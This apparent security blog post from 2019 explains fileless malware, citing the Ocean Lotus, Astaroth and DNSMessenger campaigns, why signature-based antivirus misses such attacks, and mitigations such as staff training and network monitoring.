July 10, 2019
Fileless malware is not entirely new, but there has been a resurgence, with more advanced techniques. Some examples of fileless malware:
With this technique, a malicious actor can perform their operations for a long time undetected. The Ocean Lotus Group was able to carry out Operation Cobalt Kitty for up to a year undetected by abusing system tools. Another notable example is Astaroth, a fileless trojan that has been using an Avast! AV process to run the malicious code without necessarily performing any DLL hijacking.
System tools are not the only options. In 2017, the DNSMessenger malware used DNS requests to deliver malware using TXT records. TXT records allow a DNS server to attach arbitrary text to a host or other name. The commands were then executed using PowerShell. Bypassing the PowerShell execution policy is a trivial affair, even for a script kiddie. This enables an attacker to download payloads and either execute them or inject malicious code into legitimate processes.
Conventional antivirus tools use combinations of the following methods to detect malware:
- Signature detection
- Behavioral analysis
- Sandbox analysis
With the absence of a saved file, conventional antivirus tools fail because all the above methods are based on one form of comparison or the other. The malware can perform a wide variety of tasks on a system:
- Logging keystrokes
- Stealing user credentials
- Taking screenshots
- Privilege escalation
- Lateral traversal in a network.
Mitigating Fileless attacks
- Educating staff - This is probably the best point to start, as fileless malware relies on social engineering or exploiting system vulnerabilities.
- Monitoring network traffic - Network traffic originating from unknown or untrusted domains can be an indicator of compromise.